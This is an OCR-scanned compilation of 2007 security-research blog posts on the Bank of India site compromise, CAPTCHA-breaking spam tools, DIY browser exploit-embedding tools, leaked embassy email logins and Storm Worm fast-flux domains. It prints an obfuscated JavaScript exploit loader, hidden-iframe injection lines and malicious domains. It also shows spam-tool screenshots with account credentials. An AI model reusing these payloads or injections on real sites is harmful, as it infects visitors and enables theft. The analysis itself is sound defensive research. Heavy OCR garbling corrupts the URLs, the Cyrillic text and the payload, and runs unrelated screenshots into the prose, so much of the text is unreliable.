6. http://en.wikipedia.or a /wiki/Fad 
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Bank of India Serving Malware (2007-08-31 12:03) 

Ryan at [l]ZDNet's Security blog is reporting on the 
[2]breached site of [3]Bank of India, which in the time of 
blogging is still [4]serving malware to its current and 
potential customers through the infamous Russian Business 
Network - 

81.95.144.0 / 81.95.147.255. 

At the bank's URL there's a link pointing out to 
goodtraff.biz (58.65.239.66) where an IFRAME loads to 

81.95.144.148/in.cgi?10 whereas while accessing it we get 
response from 81.95.144.146, where we get the usual 

javascript obfuscation leading us to 
81.95.144.146/at/index.php and 
81.95.144.146/rut/index.php. Furthermore, 

the second IFRAME leads us to x-traffic.biz/ts/in.cgi? 
user0224 (which is a Russian Adult Traffic network) 
redirecting us to mymoonsite.net/check/version.php? 
t=167 (81.95.148.13) and a third one loading 
goodtraff.biz/tds/index.php (empty). What does it mean? It 





means the Russian Business Network has not just managed 
to inject its presence 


on Bank of India's site, but is also using multiple-iframing as 
an attack vector, thus creating a fast-flux network with 
multiple campaigns within I'll assess in this post. 

Apparently, [5]Trend Micro's been busy uncovering the 
[6]n404 exploit kit, which is also used in this campaign 
aimed 
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[<scr ip t>docunent .write (unescape ("%3c%53%43%52%49%50%54%2 0%4c%41%4e%47%55%41%47%45%3d%22%4a%61%763 
6n53%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6F%6e%20%64%6d%69%6a%66%69%71%6c%6d%28%72%72%72%29%7 
b%76%6U72%20%74%65%6d%7 0%3d%22%22%3b%2 0V6%61%72%20%63%63%63%3d%30%3b%2 0V6%6lV2%2 0%6F%75%74%3d 
%22%22%3bV6%6lV2%20%73%74%72%3dV2%72%72%3b%6c%3dV3%74V2%2e%6c%65%6e%67%74%68%3b%77%68%69%6c3 
65%28%63%63%63%3c%3d%73%74V2%2e%6c%65%6e%67V4%68%2d%31%29%7b%77%68%69%6c%65%28V3%74%72%2e%63%fi 
8%6U72%41%74%28%63%63%63%29%2n3d%27%29%27%29V4%65%6d%7 0%3d%74%65%6d%7 0%2b%73%74%72%2e%63%68%61 
%72%4U74%28%63%63%63%2b%2b%29%3b%63%63%63%2b%2b%3b%6F%75%74%3d%6F%75%74%2b%53%74V2%69%6e%67%2e3 
6 6%7 2%6 F%6 d%43%6 8%6 U7 2%43%6 F%6 4%6 5%2 8%7 0%61 %7 2%7 3%6 5%49%6 e%7 4%2 8%7 4%6 5%6 d%7 0%2 c%3 U3 6%2 9%2 d%3 8%3 
6%29%3b%74%65%6d%70%3d%22%22%3b%7d%64%6F%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6F%75%74%29%3b%7d 
%3c%2F%53%43%52%49%50%54%3e"));dmijFiqln("92)BE)CA)C3)C2)76)CE)C3)02)04)09)90)00)93)78)08)08)04)9 
0)C9)B9)BE)BB)C3)B7)C9)83)C3)BF)B9)C8)C5)C9)C5)BC)CA)83)B9)C5)C3)90)CC)C3)C2)78)94)63)60)63)60)92 
)BE)BB)B7)BA)94)63)60)92)C5)B8)O0)BB)B9)CA)76)BF)BA)93)78)AC)A3)A2)A8)BB)C4)BA)BB)O8)78)76)B9)O2) 
B7)C9)C9)BF)BA)93)78)99)A2)A9)9F)9A)90)87)86)86)8D)88)99)9B)99)83)8E)99)99)87)83)87)87)9A)87)83)8 
F)8E)8C)9B)83)86)86)97)86)99)8F)8B)8B)98)8A)88)9B)78)94)63)60)92)85)O5)88)C0)BB)B9)CA)94)63)60)92 
)C9)CA)CF)C2)8B)94)63)60)CC)B2)90)80)76)D1)76)B8)BB)BE)87)CC)BF)C5)C8)90)76)CB)C8)C2)7E)79)AC)A3) 
A2)A8)BB)C4)BA)BB)C8)7F)91)76)D3)63)60)92)85)C9)CA)CF)C2)BB)94)63)60)92)85)BE)BB)B7)BA)94)63)60)6 

3) 60)92)B8)C5)B0)CF)94)92)BA)BF)CC)76)BF)BA)93)78)C3)CF)9A)BF)CC)97)78)94)92)85)BA)BF)CC)94)63)6E 
)5F)63)60)92)C9)B9)C8)BF)C6)CA)76)C2)B7)C4)BD)CB)B7)BD)BB)93)78)A0)B7)CC)B7)A9)B9)C8)BF)C6)CA)78) 
94)63)60)5F)5F)63)60)5F)BC)CB)C4)B9)CA)BF)C5)C4)76)C6)BA)CB)C5)C2)B9)CF)C0)7E)C8)BF)C4)C1)CF)BD)8 
7)82)76)BC)O3)C4)C3)CA)C1)D0)B7)7F)63)60)5F)D1)63)60)5F)5F)CD)BF)BF)C2)BB)76)7E)C8)BF)C4)C1)CF)BD 
)87)84)C2)BB)C4)BD)CA)8E)80)88)92)BC)C3)C4)C3)CA)C1)D0)B7)7F)63)60)5F)5F)C8)BF)C4)C1)CF)BD)87)76) 
81)93)76)C8)BF)C4)C1)CF)8D)87)91)63)60)5F)5F)C8)BF)C4)C1)CF)BD)87)76)93)76)O8)BF)C4)C1)CF)8D)87)8 

4) C9)C8)88)C9)CA)C8)BF)C4)BD)7E)86)82)BC)C3)C4)C3)CA)C1)D0)B7)85)88)7F)91)63)60)5F)5F)C8)8B)CA)CB 
)C8)C4)76)C8)BF)C4)C1)CF)BD)87)91)63)60)5F)D3)63)60)5F)63)60)5F)BC)CB)C4)B9)CA)BF)C5)C4)76)CC)CD) 
C3)BF)C7)BE)CE)CB)7E)7F)63)60)5F)D1)63)60)5F)5F)CC)B7)C8)76)C2)BC)BB)C0)06)76)93)76)86)CE)86)B9)8 
6)B9)86)B9)86)B9)91)63)60)5F)5F)CC)B7)C8)76)B8)CE)B7)C3)CD)BD)BC)76)93)76)CB)C4)BB)C9)B9)B7)C6)BB 
)7E)78)7B)CB)8F)86)8F)86)7B)CB)8F)86)8F)86)7B)CB)8B)8A)BB)B8)7B)CB)8D)8B)8E)B8)7B)CB)8E)B8)89)B9) 
7B)CB)89)8B)8D)8A)7B)CB)86)89)8D)8E)7B)CB)8B)8C)BC)8B)7B)CB)8D)8C)8E)B8)7B)CB)86)89)88)86)7B)CB)8 
9)89)BC)8B)7B)CB)8A)8F)B9)8F)7B)CB)B7)BA)8A)87)7B)CB)BA)88)89)89)7B)CB)86)BC)89)80)7B)CB)87)8A)B8 
)BB)7B)CB)89)8E)88)8E)7B)CB)8D)8A)B0)88)78)C8)B9)87)86)8E)7B)CB)86)BA)B9)88)7B)CB)BA)B7)86)89)7B) 
CB)BB)B8)8A)86)7B)CB)89)B8)BB)BC)7B)CB)8D)8B)BA)BC)7B)CB)8B)BB)BB)8D)7B)0B)8B)BB)8E)B8) 78)08)86)8 
9)88)8A)7B)CB)8C)8C)BA)BA)7B)CB)86)B9)8E)B8)7B)CB)8E)88)8A)B8)7B)CB)87)B9)8B)BB)7B)CB)BA)BA)86)89 
)7B)CB)86)8A)8E)B8)78)CB)86)89)8E)B8)7B)CB)B9)89)B9)8B)7B)CB)8D)88)8D)8B)7B)CB)80)BA)8C)B9)7B)CB) 

at the Bank of India. Is this a newly developed attack kit, or a 
modification of another popular one? Further attack 


clues will definitely indicate the second, namely that's it's a 
modification. In respect to this kit, it returns a 404 error 



within which is the obfuscated javascript, thus we have a 
fast-flux oriented kit aiming to diversify and include as many 
infected nodes in the attack process to improve its chances 
of infecting the host while the campaign remains in tact. 

The malicious URLs structure is again static just like Storm 
Worm's, and is in the following format n404-(number from 

1 to 9).htm where each page contains a different malware. 

Several more n404 exploit kit campaigns are 
currently active at the following URLs : 

msiesettings.com - 81.95.148.14 

winmplayer.com 

smoothdns.net - 81.95.148.12 

protriochki.com - 81.95.148.14 

susliksuka.com - 81.95.148.12 

uspocketpc.com - 81.95.148.13 

The exact campaign URLs : 

- my moonsite. net/check/version ml. php?t= 141 
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<iframe src=./n404-l,htm width=l height=l></iframe> 
<iframe src=./n404-2.htm width= 1 height=lx/iframe> 
ciframesrc=.Zn404-3.htm width=l height= lx/iframe> 
ciframe src=./n4G4-4,htm width=l height=lx/iframe> 
ciframe src=./n404-5.htm width=l height=l x/iframe> 
<iframe src=./n404-6,htm width=l height=l x/iframe> 
<iframe src=./n404-7,htm width=l height=l x/iframe> 
<iframe src=./n404-8,htm width=l height= lx/iframe> 
<iframe src=./n404-9.htin width= 1 height=lx/iframe> 


my moonsite. net/check/version. php?t=15 



mymoonsite.net/check/n404-l.htm 
n404-(number from 1 to 9).htm 

- uspocketpc.com/check/n404-l.htm 
n404-(number from 1 to 9).htm 

- s75.msiesettings.com/check/versionst.php?t=75 
s75.msiesettings.com/check/n404-l.htm 
n404-(number from 1 to 9).htm 

- s99.winmplayer.com/check/n404-l.php 
n404-(number from 1 to 9).htm 

- smoothdns.net/check/n404-l.htm 
n404-(number from 1 to 9).htm 

- protriochki.com/check/n404-l.htm 
n404-(number from 1 to 9).htm 

- susliksuka.com/check/n404-l.htm 
n404-(number from 1 to 9).htm 

What makes an impression is that it's relying on as many 
possible malware infections as possible, thus visiting a 
central campaign site such as 

mymoonsite.net/check/version.php?t=158 results in all the 
n404 malicious pages within the 

domain to get automatically loaded via an IFRAME, and as 
you've successfully guesed, they all contain different types 



of malware. Despite that javascript obfuscation is often used 
to hide the real location of the exploit or binary, in this 
campaign each and every n404-l.htm obtained from all 
domains has the same checksum, therefore the files at the 

different domains are identical - at least so far: 

File size: 10636 bytes 

MD5: 45594ef52a9f53f2140d4797826156ff 

SHA1: 7c4f7dl83dfaf39410902a629bl3ae5112b847f0 

447 

AntiVir 2007.08.31 HTML/Crypted.Gen 

eSafe 2007.08.29 JS.Agent.ke 

Fortinet 2007.08.31 HTML/Heuri.BIU!tr.dldr 

F-Secure 2007.08.31 Trojan-Downloader.JS.Agent.no 

Kaspersky 2007.08.31 Trojan-Downloader.JS.Agent.no 

Webwasher-Gateway 2007.08.31 Script.Crypted.Gen 

A great example of [7]a fast-flux network with way too many 
infected hosts participating in the attack, and despite 

that some seems to be down, the attack is still fully 
operational in a typical fast-flux style. 

UPDATE: [8]F-Secure's and [9]McAfee's comments on the 
case, as well as two related posts - [lOjBank of India's Web¬ 
site has been Compromised by Trojan downloader; [lljBank 
of India Official Web Site Unsafe at the Moment. 



UPDATE 2: Several hours after the Bank of India got rid of 
the iframe at its homepage, the main URL for this malware 
campaign (81.95.144.148/in.cgi?10) removed the 
javascript obfuscation and is now forwarding to Google.com. 

[12]Bank of India's post-breach statement: 

11 We have taken up the matter with our technology-partner 
and all necessary action will be taken to rectify the matter. In 
my view, the users will not be faced with any major 
problems," said Bol general manager PA Kalyansundar. 

"However, we are not completely sure that an attack 
actually happened," he clarified. " 

Here's another article from [13]The Register mentioning the 
three key points related to the campaign - the Russian 

Business Network, the n404 exploit kit which is definitely a 
[14]modification of the [15]popular ones [16]currently 

in the wild, and the use of [17]fast-flux networks. And this is 
[18]what happened when an Indian tried to reach the 

local Cybercrime uni[19]t. 

Related links: 

[20] Video of the attack 

[21] Graph of the n404 exploit kit 

1. http://blo a s.zdnet.com/securit v/? p=487 

2. http://www.webpronews.com/topnews/2007/08/3Q/bank-of- 
india-site-co-opted-bv-malware 











3. http://sunbeltblo a .blo as pot.com/2007/Q8/breakin a -bank- 
of-india-seriouslv.html 

4. http://explabs.blo as pot.com/2007/08/compromised-bank- 
website.html 

5. http://blo a .trendmicro.com/the-404-stor v 

6. http://blo a .trendmicro.com/more-russian-uprisin a 3a-new- 
iframes-and-n404-web-threat-kit/ 

7. http://www.honevnet.or a/pa pers/ff/index.html 

8. http://www.f-secure.com/weblo a /archives/archive- 
082 007.html #000012 65 

9. 

http://www.avertlabs.com/research/blo a /index. ph p/2007/08/ 

31/compromised-bank-of-india-website/ 

10. http://www.techshout.com/internet/20Q7/31/bank-of- 
iodias-website-has-been-compromised-bv-tro i an-downloade 

r-f-secure/ 

11. http://www.labnol.or g /india/interestin a /bank-of-india- 
official-website-is-unsafe-at-the-moment/1287/ 
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12 . 

http://economictimes.indiatimes.com/News/News Bv Industr 
v/Bankin a _Finance_/Hackers_plav_hide_and_seek_wit 

h_Bol_website/articleshow/2328085.cms 

13. 

http://www.there a ister.co.uk/2007/09/01/bank of india webs 

















































ite takeover/ 


14. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack- i n-italv.html 

15. http://ddanchev.blo as pot.com/2007/07/iceoack-malware- 
kit-in-action.html 


16. http://ddanchev.blo as pot.com/2007/Q5/webattacker-in- 
action.html 


17. http://www.honevnet.or a/pa pers/ff/fast-f1ux.html 

18. http://conver a ence.in/blo a /2007/08/31/bank-of-india- 
attack-arro a ant-cvbercrime-police-and-web-host/ 

19. http://conver a ence.in/blo a /2007/08/31/bank-of-india- 
attack-arro a ant-cvbercrime-oolice-and-web-host/ 

20. http://wormradar.com/boi.wmv 

21 . 

htto://extracare.trendmicro- 

europe.com/tm/core/ a lobal/ima a es/diarv/415de6c43168c331 
e0007b5c52b6a412 n4Q4. 

jug 

449 


2.9 

September 


450 







































Start testirg 219.65. :1080 ... [Done] 

Start testing 66.61. !:7312 ... [Failed] 

Start testirg 124.125. :1080 ... [Done] 


Karma 

BAWMTHbIM KOA 

Pe3ynbTaT 


IP! 

588113339 

(Jnkown error 


33HI 

927270276 

tlB 

nswi 

367830514 

Unkown error 


300568378 

Ouio6Ka: IP 124.125. 11080 3a6ndKnpoBaH Ana penicrpaukm 


Kon -BO aKKOB! 

1 


BBeg/rre cn ucoK npoxcn-cepBep oB: 

212.138. ’.80 

212.138. :80 

212.138. 180 

212.138. :80 


Start! [ 


Spammers and Phishers Breaking CAPTCHAs (2007- 
09-03 12:25) 

The emergence of CAPTCHA based authentication was a 
logical move in the fight against automated brute forcing 

of login details, registrations, spamming and sploging in the 
form of comments and splogs registration. And 

consequently, spammers, phishers and malware authors 
started figuring out how to automatically achieve their 



































objectives, by either breaking or adapting to a certain 
CAPTCHA, and even more pragmatic - outsourcing the 
request 

to a third-party. 

Two months ago, there were news stories on how spammers 
and phishers feeling the pressure put on them by 

anti spam vendors, have supposedly [ljbroken Hotmail and 
Yahoo's CAPTCHA. Nothing is impossible, the impossible 

just takes a little longer, what's important is discussing the 
many other perspectives related to adapting to a CAPTCHA, 
directly breaking it, or entirely ignoring it. 
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BanycK npoeepKM cnMCKa npoKcn-cepBepoB(oTKfiK>HMTk mojkho e c^aPine config.php),.. 
Start testing 212.138. 18 O ...[Done] 

Start testing 212.138. i80 ...[Done] 

Start testing 212.138.. 80 ...[Done] 

Start testing 212.138, ':80 ...[Done] 


JKnuTe, npoMcxOAHT coe am h e hm e c cepBepoM M aarpyzxa M3o6pa>KeHMfi,.. 


3aiUHTHWM KOA 

3HaHeHMe KOAa 

Mmh aKKayHTa 





mlemk9sw 



3 3 7 

8 3 2 7 




rsbK8xvm 



-3 9 ^ 

✓>7 ' 9 



1 

le 31 loha 



































In the first example you can see an automatic CAPTCHA 
recognition at a Russian email provider. What the script is 

doing is basically syndicating proxies, ensuring they work, 
and starting the mass registration process while providing 
confirmation or error results in between. The CAPTCHA in 
question is indeed primitive, but the email provider's clear 

IP reputation and launch pads for spam, phishing and 
malware is what the malicious parties are really interested in. 

Once the CAPTCHA becomes easily recognizable, the entire 
process of logging in and sending the malicious content 

can also be fully automated. 

In the second example you can see a great example of the 
adaptation process. The CAPTCHA cannot be 
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3aperecTpHpoE aTb 



Kon-Bo axKOB: 


efficiently abused we we've seen with the first case, but 
instead of putting efforts into breaking it directly, the 

malicious parties are simply adapting. Once proxies get 
syndicated and verified for connectivity, a request for the 

number of accounts to be registered is initiated, the script 
then responds with automatically generated logins, and 

presents the CAPTCHA to be manually entered by the 
malicious party. Malicious economies of scale in action, 






















































despite 


that the CAPTCHA cannot be broken, the process is still partly 
automated, another example of marginal thinking 

applied in order to achive an objective. 

Sample CAPTCHA breaking project requests : 

- 11 / need a captcha breaker that can break captchas that are 
of the same style i will upload here.I will want a C++ dll that 
recieves a file path and returns a char * with the content of 
the picture (letters and numbers)" 

-" The program needs to take a myspace captcha image and 
determine what the text says in the image. The accuracy 
needs to be 80 %+" 

-" We are an expert group for inputing captcha for you with 
very low price and high accuracy. We can input 10k to 100k 
(depending on how many you can offer to us) per day with 
accuracy at least 70 % (for simple captcha such as yahoo, 
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r a j j i vL>wv^auk*u f 

npoeefiMTt 

Login: iz20zvko@. 

Pass: rpem9vezyo 

npoeepiiTw 

Login: qtjxcvqw@ 

Pass: u82jnauwotz^ 

npoeepHTk 

Login: aj89w3fhfa- 
Pass: k5pt9mxth8 

npoaepMTi, 

Login: uyvqch0n(5- 
Pass: Jqydpbwsku 

nposopHTi 

Login: uo3v9ejb(5 
Pass: dmxqcku7 

npoeepMTt 

Login: cm7xakz9<g: 

Pass: h394do6lhqt 

npoeepMTt 

_ Kon-BQ aKKQB! 

8 


BBenme c nwcoK npoKCu-cepBep oB: 


212.138. 

:80 

212.138. 

|80 

212,138. 

■80 

212.138. 

: SO 


it is above 95 %). We also own expert programmers who can 
help you with writting your spiders or other softwares to get 
and manage all the captchas. " 

Some are purely malicious, others aim to verify the security 
of a CAPTCHA in development for instance. Let's summa¬ 
rize - Why are malicious parties interested in 
defeating CAPTCHA's at popular sites? 

- take advantage of the clear IP reputation of the email 
service in order to improve the chance of having their phish¬ 
ing/spam/malware email successfully received 

- set the foundations for a large scale automated 
spamming/phishing operations by using legitimate email 
addresses, 






thus improving their chances of not getting filtered 

- automated registration of splogs - spam blogs 

- as search engines are starting to crawl sites submitted at 
the most popular social networks in real time, spammers 

or malware authors are naturally interested in abusing this 
development to timely attract huge 

audiences at their splogs who often have malware embedded 
within 

What are malicious parties doing to achieve 
efficiency despite their inability to defeat an 
advanced CAPTCHA? 

- humans entering the CAPTCHAs while the script is auto 
generating, storing and auto logging with the passwords in a 

combinated with the human entered CAPTCHA 

- adapting compared to putting more efforts into rocket 
science as whenever a CAPTCHA cannot be beated automat¬ 
ically, as you already saw on the second screenshot, they're 
making it easier for humans to enter the CAPTCHA and 

faster compared to an end user browsing 

- outsourcing making it sound it's more of a quality 
assurance project of CAPTCHA to be introduced on the 
market 

What can web sites do to prevent that sort of malicious 
behaviour? Strong CAPTCHAs should be in place by default, 



but taking another perspective, the way I discussed how click 
fraud could be easily detected by advertising networks 
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syndicating IPs of already known to be malware infected 
hosts, in this very same fashion we could have CAPTCHA 
system that would check to see if, for instance, default proxy 
ports are opened at the host trying to register, and 

whether or not they're part of a botnet. With data like this 
now a commodity, a prioritization process to closely 

monitor mass registrations from these IPs is a pragmatic early 
warning system. 

Interesting reading on the big picture too - [2]CAPTCHA - The 
Broken Token : 

11 How much does it cost to have a CAPTCHA hack custom 
developed? $10 to $20 ought to do the trick; certainty no 
more than $50. But the cost isn't the point. What's more 
alarming is that thousands upon thousands of site owners 

are depending upon flawed technology to protect their sites 
from spam even though they know, or at least should 

know, that it's only a matter of time until some spam robot 
shows up and starts hammering away at those worthless 

little images. " 

The irony regarding CAPTCHAs are how less popular sites 
compared to the Web 2.0 darlings often have a more 

sophisticted CAPTCHA compared to the most widely used 
web sites. 



Related links: 


[3] Craziest Captchas on the Web 

[4] Cryptographp 

[5] OCR Research Team; [6]List of Weakness 

[7] PWNtcha - captcha decoder 

[8] XRumer 

Related posts: 

[9] But of Course It's a Pleasant Transaction 

[10] Vladuz's EBay CAPTCHA Populator 

[11] Attack of the SEO Bots on the .EDU Domain 

[12] Spam Comments Attack on Techcrunch Continuing 

[13] The Blogosphere and Splogs 

1. 

htto://tech .blor a e.com/Structu re:%20/2007/07/08/spammers 
-overcome-hotmail-and-vahoo-captcha-svstems/ 

2. http://bbspam.com/2007/08/15/captcha-the-broken-token/ 

3. http://www.tonsai.de/blo a -en a lish/2007/craziest-captchas- 
on-the-web/ 

4. http://www.cr vptoaraph p.com/ 

5. http://ocr-research.or a .ua/ 

6. http://ocr-research.or a .ua/list.html 























7. http://sam.zov.or a/ pwntcha/ 

8. http://oandalabs.pandasecuritv.com/XRumer.as ox 


9. http://ddanchev.blo as pot.com/2006/Q8/but-of-course-its- 
pleasant-transaction.html 

10. http://ddanchev.blo as pot.com/2007/Q3/vladuzs-eba v- 
ca otcha- oo pulator.html 

11. http://ddanchev.blo as pot.com/20Q7/01/attack-of-seo- 
bots-on-edu-domain.html 


12. http://ddanchev.blo as pot.com/2007/03/spam-comments- 
attack-on-techcrunch.html 


13. http://ddanchev.blo as pot.com/20Q6/ll/blo aos phere-and- 
s olo a s.html 
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IE Exploiter 

By ( ® linuxmail.org) 

Before we start please note that not all versions off Internet Explorer are vunverable to this 


Server 


C:\Downloader 2\seryer.exe 


Browse 


Finished Encoding 


Encode Server 


Create Document 

_ http; I /arevoufearless.com 







































DIY Exploits Embedding Tools - a Retrospective (2007- 
09-04 12:27) 

Great analysis by the [l]Spywareguide folks - Chris Boyd and 
Peter Jayaraj in this assessment - especially my deja 

vu moment with the King's IE Exploiter tool which I intented 
to cover in an upcoming post, in a combination with 

a brief retrospective of exploit and malware embedding tools 
that were empowering entire generations of script 

kiddies during the last couple of years. These tools are a 
great example of what the DIY trend used to look like before 
malicious economies of scale were embraced in the form of 
[2]today's modular and efficiency-centered malware kits 

we're aware of. 

- The IE Exploiter vl.0/2.0 

The tool is first know to have emerged back in 2002, with its 
latest version released in 2004. It was first branded 

as the "Fearless IE Exploiter" and then returned back to it's 
original name. Description of the vl.O : " Fearless IE 

Exploiter allows you to embed executable files into FITML 
documents, that when viewed in an unpatched version of 















Internet Explorer 5. * will automatically download and 
execute the .exe". And the description of v2.0 : 11 IE 
Exploiter v2 is a very simple tool that creates a HTML file 
with an embedded executable file. Once the HTML file is 
viewed the executable file will overwrite notepad.exe on the 
target system and then execute it using the view-source: 
prefix. " 

Result: 22/32 (68.75 %) File size: 149359 bytes 
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ul King 18 IE Exploiter Puplic Edition 


1 

K1HG19 {£ EXFtf 

IT 

00 


13 


r Om 3C3K f t’JOrirfl- 

MilKp ■— 

* 

mi r-.v ■ 

I 


rA 


C3MUJ 36113>Ka 6*11 


j http://server. com/server exe 


Example: "http:// 

/server, exe 


-SCMCnri 3636 RKGjm£)I in0x<6 3611 HhA- 


J 


- tsT'blnfi 36f T< rgpR aafl 3KH 3fi<3H$ --- 

F c/Avww j 


OC)kM 


noc3flH 


KflJKHa 36X3 Ht'l 




















Load Set vet 


http: //www. myserver. here/test mp3 


Exec Delay (m$)J5000 
Fake window ) I - 


smart path checking p 
additional custom path V 


[Load here the application to executi 


ewveus ?ixl 


|choose here youi local outputfolder for package Output Folder | 


MD5: 315cd35aa5a0334697832e83fac7b0dc 

SHA1: 71a7929f7781d969a63e532cd8cd877940a2cal2 

- King's IE Exploiter 

King's IE Exploiter is an Arabic DIY exploit embedding tool 
released around 2004. Despite that the malware embedded 

sites generated on-the-fly come totally unobfuscated, we will 
yet wait and see the eventual release of such feature. 

Result: 6/32 (18.75 %) 

File size: 253440 bytes MD5: 
e6052d3abf95429fd761feef0a695470 

SHA1: 9f91e21bf9e8898a09c36b31bblf5afff3cb8f35 
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enter message 

| Startup Metfiod 

SvsHurton 


1 Denial of Service 

Infoiinnl 



Browser Redirection 


** 


HTA File Name 


Welcome 


Bonn 




-4 


- Zephyrus 

Again relased around 2004, the description reads : 11 Its a 
prove of concept tool to generate a Stench Medi- 

aPlayer Exploit file more infos about stench can be found 
here [3] http-.//malware.comor at [4] hereAVP calls it 
exploit. Win32.zephyrus" 

Result: 30/32 (93.75 %) 

- God's Will 

The description reads : " A GODMESSAGE page is an HTML 
page that works with an ACTIVEX bug founded in 

IE5.5/OUTLOOK/OUTLOOK EXPRESS. Thanks to this bug when 
someone view our godmessaged page he downloads an 





































HTA file in his STARTUP FOLDER. ' 
Result: 32/32 (100 %) 

- Ed Html Infector 
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Sabotage Help 



The description of the tool circa 2004 reads : " Ed HTML 
Infector is a very simple tool that creates HTML file with an 
embedded executable file within. 11 

Result: 14/32 (43.75 %) 

File size: 118784 bytes 

MD5: 94c642903318f89d410c64d46f2047aa 

SHA1: b834cd34283e541dccb5aad81fb49ca97adbb48c 

1 . 

http://blo a.sp vware a uide.com/2007/09/compromised emails 
lead to ie.html 

2. http://lists. a rok.or a .uk/ pi permail/full-disclosure/2007- 
Au a ust/065427.html 


3. http://malware.com/ 

4. http://online.securitvfocus.com/bid/5543 
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The Office of Dalai Lama 65.19.137.2 c 
Indian Embassy in Oman 65.109.245.3 
Uzbekistan Consulate in France 57.66.] 

Uzbekistan Consulate in Germany 57,6 
Uzbekistan Consulate in India 57.66.15 
Uzbekistan Consulate in New York 57.6 
Uzbekistan Consulate in South Korea 5 
Uzbekistan Consulate in USA 57.66.151 
Uzbekistan Embassy iri Afghanistan 57, 

Uzbekistan Embassy in Afghanistan 57. 

Uzbekistan Embassy in Belgium 57.66 
Uzbekistan Embassy in China 57,66.15 
Uzbekistan Embassy in Dubai 57.66.15 
Uzbekistan Embassy in France 57,66,15 
Uzbekistan Embassy in Germany 57.66 
Uzbekistan Embassy in Indonesia 57.6c 
Uzbekistan Embassy in Israel 57,66.15 
Uzbekistan Embassy in Japan 57.66.15 
Uzbekistan Embassy in Kuwait 57.66.1! 

Uzbekistan Embassy in Kyrgyzstan 57.' 

Uzbekistan Embassy in Latvia 57.66,15 
Uzbekistan Embassy in Malaysia 57.66. 

Uzbekistan Embassy in Pakistan 57.66. 

Uzbekistan Embassy in Poland 57.66.1! 

Uzbekistan Embassy iri Russia 57,66.1! 

Uzbekistan Embassy in Saudi Arabia 51 
Uzbekistan Embassy in South Korea 57 
Uzbekistan Embassy in Thailand 57.66, 

Uzbekistan Embassy in The Netherland 
Uzbekistan Embassy iri Turkey 57.66.1 
Uzbekistan Embassy in Turkey 57.66.1 
Uzbekistan Embassy in Turkmenistan 5 
Uzbekistan Embassy iri Ukraine 57.66.J 

Login Details for Foreign Embassies in the Wild 
(2007-09-04 23:49) 

Login [ 1 ]detaiIs for [2]international embassies have been in 
the wild since August 30th in a [3 ]fu 11 disclosure style : 

11 Here is a list with working passwords to exactly 100 email- 
accounts to Embassies and Governments around the world. 

Yes it's the real deal and still working when we are posting 
this. So why in the world would anyone publish this kind of 
information? Because seriously, I'm not going to call the 
president of Iran and tell him that I got access to all their 
embassies. I'm DEranged, not suicidal! He has bombs and 
stuff..." 



The researcher's main motivation behind releasing these is 
that there's no point in contacting the email owners directly 
as no one would take his emails seriously enought and 
change them, so by going full disclosure it would prompt the 

embassies in question to change the passwords. Dan 
Egerstad may be quite right, at least on the passwords 
changing 

issue. Could these email accounts be accessed globally and if 
yes why? For instance, could Uzbekistan's embassy in 

London successfully login into Uzbekistan's embassy in 
Moscow, and even worse, could a host not belonging to the 

embassy's network access these mailboxes for flexibility? If 
yes, there're way too many ways this data could have been 
obtained. While going through the accounting data, we could 
both confirm that best practices for strong passwords 

are place at some embassies, and also question the lack of 
such best practices at certain ones, a security measure 

that works against brute forcing attempts, but is totally 
irrelevant when it comes to keylogging and sniffing. 

Many people would logically consider the possibility of 
abusing these login details by obtaining the content of the 

mailboxes. However, another perspective worth keeping in 
mind is the use of this login data as the foundation for 

targeted attacks on a embassy-to-embassy basis, the way 
we've seen it happen before. 

1 . 

http://www.there a ister.co.uk/2007/08/31/embassv_email_acc 
ounts exposed/ 







2. http://www.vnunet.com/vnunet/news/2197772/embass v- 
email-details-posted 

3. htt p://209.85.135.104/search? 

q = cache: 5e i Ifi NckzO I : deran a edsecuritv.com/deran a ed- a ives- 
vou-lOO-passwords-to 

-g overn ments-embassies-2/+deran a edsecuritv.com/deran ae 
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Storm Worm's Fast Flux Networks (2007-09-05 14:18) 

Following my previous posts on "[l]Storm Worm Malware 
Back in the Game" and "[2]Storm Worm's use of Dropped 
Domains", here are some handy graphs of Storm Worm's use 
of fast-flux networks generated during the last several 

hours, acting as great examples of how diverse [3]malware C 
&C has become. 





















- bnably.com 

Domain servers in listed order: 


nsl3.bnably.com 

nsl2.bnably.com 

nsll.bnably.com 
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nslO.bnably.com 

ns9.bnably.com 

ns8.bnably.com 

ns7.bnably.com 

ns6.bnably.com 





ns5.bnably.com 

ns4.bnably.com 

ns3.bnably.com 

ns2.bnably.com 

- wxtaste.com 

Domain servers in listed order: 
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*UAU*U - * » 



nsl3.wxtaste.com 

nsl2.wxtaste.com 

nsll.wxtaste.com 

nslO.wxtaste.com 


ns9.wxtaste.com 
























ns8.wxtaste.com 


ns7.wxtaste.com 

ns6.wxtaste.com 

ns5.wxtaste.com 

ns4.wxtaste.com 

ns3.wxtaste.com 

ns2.wxtaste.com 
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- snbane.com 

Domain servers in listed order: 

nsl3.snbane.com 

nsl2.snbane.com 

nsll.snbane.com 

nslO.snbane.com 

ns9.snbane.com 

ns8.snbane.com 

ns7.snbane.com 

ns6.snbane.com 

ns5.snbane.com 


ns4.snbane.com 



ns3.snbane.com 


ns2.snbane.com 
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- tibeam.com 

Domain servers in listed order: 

























nsl3.tibeam.com 


nsl2.tibeam.com 

nsll.tibeam.com 

nslO.tibeam.com 

ns9.tibeam.com 

ns8.tibeam.com 

ns7.tibeam.com 

ns6.tibeam.com 
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ns5.tibeam.com 

ns4.tibeam.com 

ns3.tibeam.com 

ns2.tibeam.com 


eqcorn.com 













Domain servers in listed order: 


nslO.eqcorn.com 

nsll.eqcorn.com 

nsl2.eqcorn.com 

nsl3.eqcorn.com 

ns2.eqcorn.com 
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ns3.eqcorn.com 

ns4.eqcorn.com 

ns5.eqcorn.com 

ns6.eqcorn.com 

ns7.eqcorn.com 

ns8.eqcorn.com 

ns9.eqcorn.com 

The Honeynet Project & Research Alliance defines [4]a fast- 
flux network as : 

11 Fast-flux service networks are a network of compromised 
computer systems with public DNS records that are 
constantly changing, in some cases every few minutes. 
These constantly changing architectures make it much more 

difficult to track down criminal activities and shut down their 
operations. " 



In Storm Worm's case, we have an example of fast-fluxing 
dropped domains, and if you research a little further, you'll 
see that newly infected Storm Worm hosts shown in this 
particular moment of the fast-flux are already sending out 

spam. 

1. http://ddanchev.blo as pot.com/2007/08/storm-worm- 
malware-back-in- a ame.html 

